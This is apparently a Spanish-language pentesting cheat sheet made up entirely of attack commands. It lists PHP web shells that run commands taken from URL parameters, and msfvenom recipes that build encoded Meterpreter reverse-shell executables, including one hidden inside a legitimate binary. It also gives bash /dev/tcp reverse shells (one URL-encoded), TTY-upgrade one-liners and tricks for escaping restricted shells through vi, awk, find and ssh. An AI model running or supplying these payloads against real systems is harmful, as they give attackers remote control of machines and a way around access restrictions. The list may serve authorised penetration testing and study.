# Ejecuta un comando
<?php system("whoami"); ?>
# shell.php?cmd=whoami
<?php system($_GET['cmd']); ?>
# Igual con passthru
<?php passthru($_GET['cmd']); ?>
# Para que shell_exec muestre el resultado hay que usar echo
<?php echo shell_exec("whoami");?>
# preg_replace().
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
# Usando backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
<?php echo `whoami`; ?>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o shell_reverse.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -e x86/shikata_ga_nai -i 9 -x "/binario.exe" -o binariOutput.exe
0<&196;exec 196<>/dev/tcp/IP/PORT; sh <&196 >&196 2>&196
bash -i >& /dev/tcp/IP/PORT 0>&1
#encoded
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2FPORT%200%3E%261%22
python -c 'import pty; pty.spawn("/bin/sh")'
python -c "import pty;pty.spawn('/bin/bash')"
python -c 'import os; os.system("/bin/bash")'
echo 'os.system('/bin/bash')'
perl -e 'exec "/bin/sh";'
:!bash
:set shell=/bin/bash
:sh
4. Evasión de shells restrictivas
ssh username@IP -t "/bin/sh"
ssh username@IP -t "bash --noprofile"
echo /usr/bin/*
$(whoami)
${whoami}
:!/bin/sh
:shell
:set shell=/bin/sh
import os; os.system("/bin/sh")
exec("sh -i");
php -r "system('/bin/bash');"
hp -a then exec("sh -i");
awk 'BEGIN {system("/bin/sh")}'
find / -name foobar -exec /bin/sh \;
echo "bash -i" | tee script.sh